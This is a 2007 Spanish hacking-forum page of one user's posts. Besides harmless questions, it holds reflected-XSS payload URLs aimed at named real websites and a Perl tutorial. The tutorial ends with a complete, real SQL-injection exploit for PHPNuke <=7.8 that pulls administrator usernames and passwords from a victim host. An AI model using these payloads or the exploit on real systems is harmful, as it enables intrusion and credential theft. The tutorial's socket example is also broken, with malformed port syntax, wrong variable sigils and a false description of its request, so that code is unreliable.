elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 ... 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 [416] 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 ... 437
4151  Programación / PHP / Re: Letras en imagenes en: 30 Octubre 2007, 05:52 am
Se ve entretenido... lo voy a estudiar, gracias.
4152  Programación / PHP / Letras en imagenes en: 30 Octubre 2007, 05:21 am
No se si han hecho esta pregunta o no pero ya busqué en el foro y no vi nada al respecto.

Como puedo escribir letras en una variable en php para que me de de salida un jpg o png con un testo dentro?, por ejemplo: imagen.php?palabra=hola y que aparezca un jpg que diga hola.

Quiero hacer algo como esto  ;D :
4153  Seguridad Informática / Nivel Web / Re: XSS en Zone-H en: 30 Octubre 2007, 02:29 am
 :xD weee te bajaron el rango jajajajjaja ...ahi te veo  :P Salu2
4154  Seguridad Informática / Nivel Web / Re: XSS en Zone-H en: 30 Octubre 2007, 02:16 am
Juazz
Código:
http://secwatch.org/?page=contact&name=a"><script>alert(/xss/);</script>

Además que raro cada ves que cambias pone una imagen diferente segun lo que escribas:
Código:
http://secwatch.org/account/?mode=newsletter&email=plop@tu.yossssssss'%22%3E%3Ch1%3Elol
http://secwatch.org/account/?mode=newsletter&email=holaaaaaaaa
:P

4155  Media / Diseño Gráfico / Re: Problemas con decompilar SWF en: 28 Octubre 2007, 17:12 pm
Nunca podrás descompilar exactamente un flash a fla, lo que si puede hacer el descompilador es asemejar un fla a la función del swf pero nunca quedará igual. Hasta ahora el mejor que he visto es el flash decompiler de etima software.
4156  Programación / Programación Visual Basic / Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form en: 28 Octubre 2007, 17:01 pm
Perdón :P esque hace mucho que dejé VB
4157  Programación / Programación Visual Basic / Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form en: 28 Octubre 2007, 16:53 pm
Seleccionas el form y abajo en propiedades aparece visible=false eso debes cambiarlo a true o insertarle este código:
Código
  1. form1.hide = true
4158  Programación / Scripting / Re: aprender perl en: 28 Octubre 2007, 16:42 pm
Estoy aprendiendo algunas cosas en Perl asi que les voy a explicar un poco de lo que hasta ahora he entendido.

Perl es un lenguaje interpretado el cual consiste en sun software llamado "PERL" existente tanto para Linux(por defecto) como para Windows(activeperl) que ejecuta directamente los scripts creados con extensión *.pl

Por ejemplo:
Linux= perl ./archivo.pl
Windows= c:\perl\perl.exe c:\archivo.pl

El que sepa programar en C o en PHP entonces le resultará muy facil poder aprender perl ya que ambos se basan en lenguaje C++ en su gran parte.

Para comenzar lo primero que haremos es descargar ActivePerl si estás en windows  Descarga y si usas Linux entonces ya viene incluido por defecto.

Ahora en Windows utilizaremos el block de notas o el UltraEdit (da igual), en Linux utilizaremos un editro de texto cualquiera como kwrite o gedit. Nunca utilizar Microsoft Word ni Open Office porque el formato de texto no es el mismo.

En el editor de textos vamos a crear nuestro primero primer script:

hola.pl
Código
  1. print('hola');

Ahora lo guardamos como "hola.pl" y desde Linux ejecutamos perl ./hola.pl, desde Windows ejecutas C:\perl\perl.exe c:\hola.pl y en ambos casos verás en la pantalla la palabra "hola".

Al igual que en C y PHP puedes utilizar \n para continuar el texto un reglón mas abajo.

Ahora veremos algunas declaraciones básicas.

declaracion.pl
Código
  1. my $nombre = 'WHK';
  2. my $saludo = 'Hola '.$nombre.' como estas';
  3. print($saludo);

Al ejecutarlo dirá: "Hola WHK como estas"

Si te fijas bién a diferencia de PHP acá tienes que anteponer my antes de cada declaración o hacerla antes de la siguiente manera:

declaracion.pl
Código
  1. my ($nombre, $saludo);
  2. $nombre = 'WHK';
  3. $saludo = 'Hola '.$nombre.' como estas';
  4. print($saludo);

De las dos formas da igual.

Ahora que ya sabemos escribir intentaremos usar algunas funciones como while:

while.pl
Código
  1. my $i = 1;
  2. my $fin = 10;
  3.  
  4. while ( $i <= $fin ) {
  5. print ('*');
  6. $i++;
  7. }
  8.  

Esto significa que escribirá el asterisco 10 veces. Puedes reemplazar print '*'; por tu código para que se repita todas las veces que sea necesario.

Puedes usar print de la siguiente manera:
Código
  1. print ('hola');
  2. print ("hola");
  3. print 'hola';
  4. print "hola";

Si por ejemplo necesito escribir las comillas entonces se hace igual que en PHP:
Código
  1. print '<body bgcolor"black" text="red"><center><h2>hola</h2></center></body>';
  2. print "<body bgcolor'black' text='red'><center><h2>hola</h2></center></body>";

Si te fijas bién imprimí comillas simples y doble comillas. Si escribo todo con comillas simples o con comillas dobles entonces dará error.

Ahora utilizaremos variables.

variable.pl
Código
  1. $v1 = $ARGV[0];
  2. $v2 = $ARGV[1];
  3. print "Tu escribiste $0 $v1 $v2";
  4.  

Ejecutamos perl ./variable.pl 10 30 o c:\perl\perl.exe c:\variable.pl 10 30
$0 significa el nombre del mismo archivo y v1, v2 son las variables. Puedes crear todas las que quieras.

Otro ejemplo:
variable2.pl
Código
  1. $uno = $ARGV[0];
  2. $dos = $ARGV[1];
  3. $tres = $ARGV[2];
  4.  
  5. if (@ARGV < 2)
  6. {
  7. print "*=======================================*\n";
  8. print "* EXPLOIT bla bla bla by WHK\n";
  9. print "*=======================================*\n\n";
  10. print " Uso : \n";
  11. print " exploit.pl HOST /path/ \n\n";
  12. print " Example :\n\n";
  13. print " exploit.pl www.victim.com /ruta/ \n\n";
  14. exit(1);
  15. }
  16.  
  17. print $uno;
  18. print $dos;
  19. print $tres . "prueba\n\n";
  20. exit(0);

if (@ARGV < 2) quiere decir que si no están escritas todas las variables entonces explicará su uso.

Ahora usaremos sockets  ;D no se asusten porque no es tan dificil.

sockets.pl
Código
  1. use IO::Socket;
  2. use threads;
  3.  
  4. $sock = IO::Socket::INET->new(PeerAddr => 'google.cl',
  5.                              PeerPort => 'http('80')',
  6.                              Proto    => 'tcp');
  7.  
  8. print $sock "Petición\r\n\r\n";
  9.  
  10. $send = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "[*] Connect [FAILED]\n";
  11.  
  12. print $send "POST ".$GET." HTTP/1.0\n";
  13. print $send "Host: ".%HOST."\n";
  14. print $send "User-Agent: Internet Explorer 6.0 [SR]\n";
  15. print $send "Content-Type: application/x-www-form-urlencoded\n";
  16. print $send "Content-Length: ".$length."\n\n";
  17. print $send $query;
  18. print $send "Cookie: lang=english\r\n\r\n";
  19. print $send "Connection: close\n\n";

Como se ve acá estamos haciendo una petición GET al servidor de google al puerto 80 con el protocolo TCP.

También puedes usar variables en funciones de sockets:
ejemplo.pl
Código
  1. #!/usr/bin/perl -w
  2. use IO::Socket;
  3.  
  4. if (@ARGV < 2)
  5. {
  6. print "*---------------------------------------*\n";
  7. print "* EXPLOIT for PHPNuke <=7.8 *\n";
  8. print "*---------------------------------------*\n\n";
  9. print " Usage : \n";
  10. print " PHPNuke[1] HOST /[path_phpnuke] \n\n";
  11. print " HOST - Host where is phpnuke example: localhost \n\n";
  12. print " Example :\n\n";
  13. print " PHPNuke[1] www.victim.com /phpnuke/html/ \n\n";
  14. exit();
  15. }
  16.  
  17. $HOST = $ARGV[0];
  18. $phpnuke_path = $ARGV[1];
  19.  
  20. print "\n";
  21. print "Host : $HOST\n";
  22. print "phpnuke_path : $phpnuke_path\n";
  23. print "\n";
  24. $OK = 0;
  25. $modules = "modules.php";
  26. $query = "name=Search&query=s%')/**/UNION/**/SELECT/**/0,pwd,0,aid,0,0,0,0,0,0/**/FROM/**/nuke_authors/*";
  27. $length = length $query;
  28. $GET = $phpnuke_path . $modules;
  29. print "[*] Connecting at victim host [OK]\n";
  30. $send = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "[*] Connect [FAILED]\n";
  31. print "[*] Connected [OK]\n";
  32. print "[*] Sending exploit [OK]\n\n";
  33. print $send "POST ".$GET." HTTP/1.0\n";
  34. print $send "Host: ".%HOST."\n";
  35. print $send "Referer: http://".%HOST.$phpnuke_path."modules.php?name=Search \r\n";
  36. print $send "User-Agent: Internet Explorer 6.0 [SR]\n";
  37. print $send "Content-Type: application/x-www-form-urlencoded\n";
  38. print $send "Content-Length: ".$length."\n\n";
  39. print $send $query;
  40. print $send "Cookie: lang=english\r\n\r\n";
  41. print $send "Connection: close\n\n";
  42.  
  43. print "[*] Exploit send [OK]\n";
  44. print "[*] Wait for reply...[OK]\n";
  45. while ($answer = <$send>)
  46. {
  47. if ($answer =~ /=0"><b>([^:]*)<\/b>/ ) {
  48. $OK = 1;
  49. print "[*] Success [OK]\n";
  50. print "[*] USER: $1\n";
  51. }
  52. if ($answer =~ /=\"0">([^:]*)<\/a>/ ) {
  53. $OK = 1;
  54. print "[*] PASSWORD: $1\n";
  55. }
  56. }
  57. if ($OK == 0) { print "[*] Exploit [FAILED]\n"; }
  58.  
  59. # milw0rm.com [2005-11-16]

Este es un exploit real que bajé desde milw0rm.

Con un poco de imaginación es posible hacer muchas cosas... se que existen maneras de crear procesos y sub procesos con fork , además de controlar paquetes tcp con rawpackets imitando un spoofing ip entre muchas otras cosas.
4159  Media / Juegos y Consolas / LevelHead en: 27 Octubre 2007, 23:54 pm
Muy exelente juego para linux donde intentas guiar una persona en miniatura hasta la salida recordando cada pasaje dentro de un cubo real virtualizado desde tu webcam.

Acá les dejo un video impresionante. Realmente es primera ves que veo algo de este tipo.

4160  Seguridad Informática / Nivel Web / XSS en Zone-H en: 27 Octubre 2007, 16:53 pm
Encontré un XSS en zone-h  :P ...muy curioso no?

Código:
http://www.zone-h.org/index.php?searchword=`´';}"></script><script>alert(/xss/);</script>&option=com_search&Itemid=5

Lo puse en xssed haber si lo ven antes que lo reparen y despues les aviso.

Por lo que vi hay muchos otros descubierto por otras personas... ya no me dan ganas de usar joomla jajajja.
Páginas: 1 ... 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 [416] 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 ... 437
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines